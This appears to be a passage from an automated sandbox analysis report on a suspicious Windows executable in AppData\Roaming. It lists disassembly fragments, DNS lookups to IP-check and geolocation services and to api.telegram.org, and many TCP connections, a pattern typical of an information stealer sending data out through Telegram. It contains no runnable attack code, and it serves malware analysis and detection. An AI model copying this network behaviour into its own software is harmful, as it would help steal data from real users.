                  Source: C:\Users\user\AppData\Roaming\cmnjgyugo61000.exeCode function: 4x nop then jmp 003F1EA1h8_2_003F1BD0
                  Source: C:\Users\user\AppData\Roaming\cmnjgyugo61000.exeCode function: 4x nop then jmp 003F98CAh8_2_003F95D0
                  Source: C:\Users\user\AppData\Roaming\cmnjgyugo61000.exeCode function: 4x nop then jmp 003F3599h8_2_003F32C8
                  Source: C:\Users\user\AppData\Roaming\cmnjgyugo61000.exeCode function: 4x nop then jmp 003FDBBAh8_2_003FD8C0
                  Source: C:\Users\user\AppData\Roaming\cmnjgyugo61000.exeCode function: 4x nop then jmp 0054033Ah8_2_00540040
                  Source: C:\Users\user\AppData\Roaming\cmnjgyugo61000.exeCode function: 4x nop then jmp 0054330Ah8_2_00543010
                  Source: C:\Users\user\AppData\Roaming\cmnjgyugo61000.exeCode function: 4x nop then jmp 00541B22h8_2_00541828
                  Source: C:\Users\user\AppData\Roaming\cmnjgyugo61000.exeCode function: 4x nop then jmp 005437D2h8_2_005434D8
                  Source: C:\Users\user\AppData\Roaming\cmnjgyugo61000.exeCode function: 4x nop then jmp 00541FEAh8_2_00541CF0
                  Source: C:\Users\user\AppData\Roaming\cmnjgyugo61000.exeCode function: 4x nop then jmp 00541192h8_2_00540E98
                  Source: C:\Users\user\AppData\Roaming\cmnjgyugo61000.exeCode function: 4x nop then jmp 0054297Ah8_2_00542680
                  Source: C:\Users\user\AppData\Roaming\cmnjgyugo61000.exeCode function: 4x nop then jmp 00542E42h8_2_00542B48
                  Source: C:\Users\user\AppData\Roaming\cmnjgyugo61000.exeCode function: 4x nop then jmp 0054165Ah8_2_00541360
                  Source: C:\Users\user\AppData\Roaming\cmnjgyugo61000.exeCode function: 4x nop then jmp 00540802h8_2_00540508
                  Source: C:\Users\user\AppData\Roaming\cmnjgyugo61000.exeCode function: 4x nop then jmp 00540CCAh8_2_005409D0
                  Source: C:\Users\user\AppData\Roaming\cmnjgyugo61000.exeCode function: 4x nop then jmp 005424B3h8_2_005421B8
                  Source: C:\Users\user\AppData\Roaming\cmnjgyugo61000.exeCode function: 4x nop then jmp 00543C9Ah8_2_005439A0
                  Source: C:\Users\user\AppData\Roaming\cmnjgyugo61000.exeCode function: 4x nop then jmp 005689F9h8_2_00568750
                  Source: C:\Users\user\AppData\Roaming\cmnjgyugo61000.exeCode function: 4x nop then jmp 00569701h8_2_00569458
                  Source: C:\Users\user\AppData\Roaming\cmnjgyugo61000.exeCode function: 4x nop then jmp 0056FA11h8_2_0056F740
                  Source: C:\Users\user\AppData\Roaming\cmnjgyugo61000.exeCode function: 4x nop then jmp 00566FE9h8_2_00566D40
                  Source: C:\Users\user\AppData\Roaming\cmnjgyugo61000.exeCode function: 4x nop then jmp 00567CF1h8_2_00567A48
                  Source: C:\Users\user\AppData\Roaming\cmnjgyugo61000.exeCode function: 4x nop then jmp 0056BA19h8_2_0056B770
                  Source: C:\Users\user\AppData\Roaming\cmnjgyugo61000.exeCode function: 4x nop then jmp 00563319h8_2_00563070
                  Source: C:\Users\user\AppData\Roaming\cmnjgyugo61000.exeCode function: 4x nop then jmp 00564021h8_2_00563D78
                  Source: C:\Users\user\AppData\Roaming\cmnjgyugo61000.exeCode function: 4x nop then jmp 0056C721h8_2_0056C478
                  Source: C:\Users\user\AppData\Roaming\cmnjgyugo61000.exeCode function: 4x nop then jmp 0056EC49h8_2_0056E978
                  Source: C:\Users\user\AppData\Roaming\cmnjgyugo61000.exeCode function: 4x nop then jmp 0056AD11h8_2_0056AA68
                  Source: C:\Users\user\AppData\Roaming\cmnjgyugo61000.exeCode function: 4x nop then jmp 0056F0E1h8_2_0056EE10
                  Source: C:\Users\user\AppData\Roaming\cmnjgyugo61000.exeCode function: 4x nop then jmp 0056B5C1h8_2_0056B318
                  Source: C:\Users\user\AppData\Roaming\cmnjgyugo61000.exeCode function: 4x nop then jmp 005692A9h8_2_00569000
                  Source: C:\Users\user\AppData\Roaming\cmnjgyugo61000.exeCode function: 4x nop then jmp 005655D9h8_2_00565330
                  Source: C:\Users\user\AppData\Roaming\cmnjgyugo61000.exeCode function: 4x nop then jmp 0056DCD9h8_2_0056DA30
                  Source: C:\Users\user\AppData\Roaming\cmnjgyugo61000.exeCode function: 4x nop then jmp 005662E1h8_2_00566038
                  Source: C:\Users\user\AppData\Roaming\cmnjgyugo61000.exeCode function: 4x nop then jmp 0056C2C9h8_2_0056C020
                  Source: C:\Users\user\AppData\Roaming\cmnjgyugo61000.exeCode function: 4x nop then jmp 00563BC9h8_2_00563920
                  Source: C:\Users\user\AppData\Roaming\cmnjgyugo61000.exeCode function: 4x nop then jmp 0056CFD1h8_2_0056CD28
                  Source: C:\Users\user\AppData\Roaming\cmnjgyugo61000.exeCode function: 4x nop then jmp 005648D1h8_2_00564628
                  Source: C:\Users\user\AppData\Roaming\cmnjgyugo61000.exeCode function: 4x nop then jmp 0056CB7Bh8_2_0056C8D0
                  Source: C:\Users\user\AppData\Roaming\cmnjgyugo61000.exeCode function: 4x nop then jmp 00564479h8_2_005641D0
                  Source: C:\Users\user\AppData\Roaming\cmnjgyugo61000.exeCode function: 4x nop then jmp 00565181h8_2_00564ED8
                  Source: C:\Users\user\AppData\Roaming\cmnjgyugo61000.exeCode function: 4x nop then jmp 0056D881h8_2_0056D5D8
                  Source: C:\Users\user\AppData\Roaming\cmnjgyugo61000.exeCode function: 4x nop then jmp 0056B169h8_2_0056AEC0
                  Source: C:\Users\user\AppData\Roaming\cmnjgyugo61000.exeCode function: 4x nop then jmp 0056BE71h8_2_0056BBC8
                  Source: C:\Users\user\AppData\Roaming\cmnjgyugo61000.exeCode function: 4x nop then jmp 00563771h8_2_005634C8
                  Source: C:\Users\user\AppData\Roaming\cmnjgyugo61000.exeCode function: 4x nop then jmp 00567899h8_2_005675F0
                  Source: C:\Users\user\AppData\Roaming\cmnjgyugo61000.exeCode function: 4x nop then jmp 005685A1h8_2_005682F8
                  Source: C:\Users\user\AppData\Roaming\cmnjgyugo61000.exeCode function: 4x nop then jmp 00565E89h8_2_00565BE0
                  Source: C:\Users\user\AppData\Roaming\cmnjgyugo61000.exeCode function: 4x nop then jmp 0056E7B1h8_2_0056E4E0
                  Source: C:\Users\user\AppData\Roaming\cmnjgyugo61000.exeCode function: 4x nop then jmp 00566B91h8_2_005668E8
                  Source: C:\Users\user\AppData\Roaming\cmnjgyugo61000.exeCode function: 4x nop then jmp 00566739h8_2_00566490
                  Source: C:\Users\user\AppData\Roaming\cmnjgyugo61000.exeCode function: 4x nop then jmp 00567441h8_2_00567198
                  Source: C:\Users\user\AppData\Roaming\cmnjgyugo61000.exeCode function: 4x nop then jmp 0056D429h8_2_0056D180
                  Source: C:\Users\user\AppData\Roaming\cmnjgyugo61000.exeCode function: 4x nop then jmp 00564D29h8_2_00564A80
                  Source: C:\Users\user\AppData\Roaming\cmnjgyugo61000.exeCode function: 4x nop then jmp 00565A31h8_2_00565788
                  Source: C:\Users\user\AppData\Roaming\cmnjgyugo61000.exeCode function: 4x nop then jmp 0056E1C5h8_2_0056DE88
                  Source: C:\Users\user\AppData\Roaming\cmnjgyugo61000.exeCode function: 4x nop then jmp 00569B59h8_2_005698B0
                  Source: C:\Users\user\AppData\Roaming\cmnjgyugo61000.exeCode function: 4x nop then jmp 00568149h8_2_00567EA0
                  Source: C:\Users\user\AppData\Roaming\cmnjgyugo61000.exeCode function: 4x nop then jmp 0056F579h8_2_0056F2A8
                  Source: C:\Users\user\AppData\Roaming\cmnjgyugo61000.exeCode function: 4x nop then jmp 00568E51h8_2_00568BA8
                  Source: C:\Users\user\AppData\Roaming\cmnjgyugo61000.exeCode function: 4x nop then lea esp, dword ptr [ebp-04h]8_2_00655F28
                  Source: C:\Users\user\AppData\Roaming\cmnjgyugo61000.exeCode function: 4x nop then lea esp, dword ptr [ebp-04h]8_2_00655F38
                  Source: C:\Users\user\AppData\Roaming\cmnjgyugo61000.exeCode function: 4x nop then lea esp, dword ptr [ebp-04h]8_2_00652B00
                  Source: C:\Users\user\AppData\Roaming\cmnjgyugo61000.exeCode function: 4x nop then lea esp, dword ptr [ebp-04h]8_2_00652AF2
                  Source: global trafficDNS query: name: checkip.dyndns.org
                  Source: global trafficDNS query: name: checkip.dyndns.org
                  Source: global trafficDNS query: name: reallyfreegeoip.org
                  Source: global trafficDNS query: name: checkip.dyndns.org
                  Source: global trafficDNS query: name: checkip.dyndns.org
                  Source: global trafficDNS query: name: reallyfreegeoip.org
                  Source: global trafficDNS query: name: checkip.dyndns.org
                  Source: global trafficDNS query: name: checkip.dyndns.org
                  Source: global trafficDNS query: name: reallyfreegeoip.org
                  Source: global trafficDNS query: name: checkip.dyndns.org
                  Source: global trafficDNS query: name: checkip.dyndns.org
                  Source: global trafficDNS query: name: reallyfreegeoip.org
                  Source: global trafficDNS query: name: reallyfreegeoip.org
                  Source: global trafficDNS query: name: checkip.dyndns.org
                  Source: global trafficDNS query: name: checkip.dyndns.org
                  Source: global trafficDNS query: name: reallyfreegeoip.org
                  Source: global trafficDNS query: name: checkip.dyndns.org
                  Source: global trafficDNS query: name: checkip.dyndns.org
                  Source: global trafficDNS query: name: reallyfreegeoip.org
                  Source: global trafficDNS query: name: checkip.dyndns.org
                  Source: global trafficDNS query: name: checkip.dyndns.org
                  Source: global trafficDNS query: name: reallyfreegeoip.org
                  Source: global trafficDNS query: name: checkip.dyndns.org
                  Source: global trafficDNS query: name: checkip.dyndns.org
                  Source: global trafficDNS query: name: reallyfreegeoip.org
                  Source: global trafficDNS query: name: api.telegram.org
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 188.114.96.3:443
                  Source: global trafficTCP traffic: 192.168.2.22:49168 -> 188.114.96.3:443
                  Source: global trafficTCP traffic: 192.168.2.22:49170 -> 188.114.96.3:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 188.114.96.3:443
                  Source: global trafficTCP traffic: 192.168.2.22:49174 -> 188.114.97.3:443
                  Source: global trafficTCP traffic: 192.168.2.22:49176 -> 188.114.96.3:443
                  Source: global trafficTCP traffic: 192.168.2.22:49178 -> 188.114.97.3:443
                  Source: global trafficTCP traffic: 192.168.2.22:49180 -> 188.114.97.3:443
                  Source: global trafficTCP traffic: 192.168.2.22:49182 -> 188.114.97.3:443
                  Source: global trafficTCP traffic: 192.168.2.22:49183 -> 149.154.167.220:443
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 87.120.84.38:80
                  Source: global trafficTCP traffic: 192.168.2.22:49166 -> 158.101.44.242:80
                  Source: global trafficTCP traffic: 192.168.2.22:49166 -> 158.101.44.242:80
                  Source: global trafficTCP traffic: 192.168.2.22:49166 -> 158.101.44.242:80
                  Source: global trafficTCP traffic: 192.168.2.22:49169 -> 193.122.6.168:80
                  Source: global trafficTCP traffic: 192.168.2.22:49171 -> 193.122.6.168:80
                  Source: global trafficTCP traffic: 192.168.2.22:49173 -> 132.226.247.73:80
                  Source: global trafficTCP traffic: 192.168.2.22:49175 -> 193.122.6.168:80
                  Source: global trafficTCP traffic: 192.168.2.22:49177 -> 132.226.247.73:80
                  Source: global trafficTCP traffic: 192.168.2.22:49179 -> 132.226.8.169:80
                  Source: global trafficTCP traffic: 192.168.2.22:49181 -> 132.226.8.169:80
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 188.114.96.3:443
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 188.114.96.3:443
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 188.114.96.3:443
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 188.114.96.3:443
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 188.114.96.3:443
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 188.114.96.3:443
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 188.114.96.3:443
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 188.114.96.3:443
                  Source: global trafficTCP traffic: 192.168.2.22:49168 -> 188.114.96.3:443
                  Source: global trafficTCP traffic: 192.168.2.22:49168 -> 188.114.96.3:443
                  Source: global trafficTCP traffic: 192.168.2.22:49168 -> 188.114.96.3:443
                  Source: global trafficTCP traffic: 192.168.2.22:49168 -> 188.114.96.3:443
                  Source: global trafficTCP traffic: 192.168.2.22:49168 -> 188.114.96.3:443
                  Source: global trafficTCP traffic: 192.168.2.22:49168 -> 188.114.96.3:443
                  Source: global trafficTCP traffic: 192.168.2.22:49170 -> 188.114.96.3:443
                  Source: global trafficTCP traffic: 192.168.2.22:49170 -> 188.114.96.3:443
                  Source: global trafficTCP traffic: 192.168.2.22:49170 -> 188.114.96.3:443
                  Source: global trafficTCP traffic: 192.168.2.22:49170 -> 188.114.96.3:443
                  Source: global trafficTCP traffic: 192.168.2.22:49170 -> 188.114.96.3:443
                  Source: global trafficTCP traffic: 192.168.2.22:49170 -> 188.114.96.3:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 188.114.96.3:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 188.114.96.3:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 188.114.96.3:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 188.114.96.3:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 188.114.96.3:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 188.114.96.3:443
                  Source: global trafficTCP traffic: 192.168.2.22:49174 -> 188.114.97.3:443
                  Source: global trafficTCP traffic: 192.168.2.22:49174 -> 188.114.97.3:443
                  Source: global trafficTCP traffic: 192.168.2.22:49174 -> 188.114.97.3:443
                  Source: global trafficTCP traffic: 192.168.2.22:49174 -> 188.114.97.3:443
                  Source: global trafficTCP traffic: 192.168.2.22:49174 -> 188.114.97.3:443
                  Source: global trafficTCP traffic: 192.168.2.22:49174 -> 188.114.97.3:443
                  Source: global trafficTCP traffic: 192.168.2.22:49176 -> 188.114.96.3:443
                  Source: global trafficTCP traffic: 192.168.2.22:49176 -> 188.114.96.3:443
                  Source: global trafficTCP traffic: 192.168.2.22:49176 -> 188.114.96.3:443
                  Source: global trafficTCP traffic: 192.168.2.22:49176 -> 188.114.96.3:443
                  Source: global trafficTCP traffic: 192.168.2.22:49176 -> 188.114.96.3:443
                  Source: global trafficTCP traffic: 192.168.2.22:49176 -> 188.114.96.3:443
                  Source: global trafficTCP traffic: 192.168.2.22:49178 -> 188.114.97.3:443
                  Source: global trafficTCP traffic: 192.168.2.22:49178 -> 188.114.97.3:443
                  Source: global trafficTCP traffic: 192.168.2.22:49178 -> 188.114.97.3:443
                  Source: global trafficTCP traffic: 192.168.2.22:49178 -> 188.114.97.3:443
                  Source: global trafficTCP traffic: 192.168.2.22:49178 -> 188.114.97.3:443
                  Source: global trafficTCP traffic: 192.168.2.22:49178 -> 188.114.97.3:443
                  Source: global trafficTCP traffic: 192.168.2.22:49180 -> 188.114.97.3:443
                  Source: global trafficTCP traffic: 192.168.2.22:49180 -> 188.114.97.3:443
                  Source: global trafficTCP traffic: 192.168.2.22:49180 -> 188.114.97.3:443
                  Source: global trafficTCP traffic: 192.168.2.22:49180 -> 188.114.97.3:443
                  Source: global trafficTCP traffic: 192.168.2.22:49180 -> 188.114.97.3:443
                  Source: global trafficTCP traffic: 192.168.2.22:49180 -> 188.114.97.3:443
                  Source: global trafficTCP traffic: 192.168.2.22:49182 -> 188.114.97.3:443
                  Source: global trafficTCP traffic: 192.168.2.22:49182 -> 188.114.97.3:443
                  Source: global trafficTCP traffic: 192.168.2.22:49182 -> 188.114.97.3:443
                  Source: global trafficTCP traffic: 192.168.2.22:49182 -> 188.114.97.3:443
                  Source: global trafficTCP traffic: 192.168.2.22:49182 -> 188.114.97.3:443
                  Source: global trafficTCP traffic: 192.168.2.22:49182 -> 188.114.97.3:443
                  Source: global trafficTCP traffic: 192.168.2.22:49183 -> 149.154.167.220:443
                  Source: global trafficTCP traffic: 192.168.2.22:49183 -> 149.154.167.220:443
                  Source: global trafficTCP traffic: 192.168.2.22:49183 -> 149.154.167.220:443
                  Source: global trafficTCP traffic: 192.168.2.22:49183 -> 149.154.167.220:443
                  Source: global trafficTCP traffic: 192.168.2.22:49183 -> 149.154.167.220:443
                  Source: global trafficTCP traffic: 192.168.2.22:49183 -> 149.154.167.220:443
                  Source: global trafficTCP traffic: 192.168.2.22:49183 -> 149.154.167.220:443
                  Source: global trafficTCP traffic: 192.168.2.22:49183 -> 149.154.167.220:443
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 87.120.84.38:80
                  Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49165
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 87.120.84.38:80
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 87.120.84.38:80
                  Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49165
                  Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49165
                  Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49165
                  Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49165
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 87.120.84.38:80
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 87.120.84.38:80
                  Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49165
                  Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49165
                  Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49165
                  Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49165
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 87.120.84.38:80
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 87.120.84.38:80
                  Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49165
                  Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49165
                  Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49165
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 87.120.84.38:80
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 87.120.84.38:80
                  Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49165
                  Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49165
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 87.120.84.38:80
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 87.120.84.38:80
                  Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49165
                  Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49165
                  Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49165
                  Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49165
                  Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49165
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 87.120.84.38:80
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 87.120.84.38:80
                  Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49165
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 87.120.84.38:80
                  Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49165
                  Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49165
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 87.120.84.38:80
                  Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49165
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 87.120.84.38:80
                  Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49165
                  Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49165
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 87.120.84.38:80
                  Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49165
                  Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49165
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 87.120.84.38:80
                  Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49165
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 87.120.84.38:80
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 87.120.84.38:80
                  Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49165
                  Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49165
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 87.120.84.38:80
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 87.120.84.38:80
                  Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49165
                  Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49165
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 87.120.84.38:80
                  Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49165
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 87.120.84.38:80
                  Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49165
                  Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49165
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 87.120.84.38:80
                  Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49165
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 87.120.84.38:80
                  Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49165
                  Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49165
                  Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49165
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 87.120.84.38:80
                  Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49165
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 87.120.84.38:80
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 87.120.84.38:80
                  Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49165
                  Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49165
                  Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49165
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 87.120.84.38:80
                  Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49165
                  Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49165
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 87.120.84.38:80
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 87.120.84.38:80
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 87.120.84.38:80
                  Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49165
                  Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49165
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 87.120.84.38:80
                  Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49165
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 87.120.84.38:80
                  Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49165
                  Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49165
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 87.120.84.38:80
                  Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49165
                  Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49165
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 87.120.84.38:80
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 87.120.84.38:80
                  Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49165
                  Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49165
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 87.120.84.38:80
                  Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49165
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 87.120.84.38:80
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 87.120.84.38:80
                  Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49165
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 87.120.84.38:80
                  Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49165
                  Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49165
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 87.120.84.38:80
                  Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49165
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 87.120.84.38:80
                  Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49165
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 87.120.84.38:80
                  Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49165
                  Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49165
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 87.120.84.38:80
                  Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49165
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 87.120.84.38:80
                  Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49165
                  Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49165
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 87.120.84.38:80
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 87.120.84.38:80
                  Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49165
                  Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49165
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 87.120.84.38:80
                  Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49165
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 87.120.84.38:80
                  Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49165
                  Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49165
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 87.120.84.38:80
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 87.120.84.38:80
                  Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49165
                  Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49165
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 87.120.84.38:80
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 87.120.84.38:80
                  Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49165
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 87.120.84.38:80
                  Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49165
                  Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49165
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 87.120.84.38:80
                  Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49165
                  Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49165
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 87.120.84.38:80
                  Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49165
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 87.120.84.38:80
                  Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49165
                  Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49165
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 87.120.84.38:80
                  Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49165
                  Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49165
                  Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49165
                  Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49165
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 87.120.84.38:80
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 87.120.84.38:80
                  Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49165
                  Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49165
                  Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49165
                  Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49165
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 87.120.84.38:80
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 87.120.84.38:80
                  Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49165
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 87.120.84.38:80
                  Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49165
                  Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49165
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 87.120.84.38:80
                  Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49165
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 87.120.84.38:80
                  Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49165
                  Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49165
                  Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49165
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 87.120.84.38:80
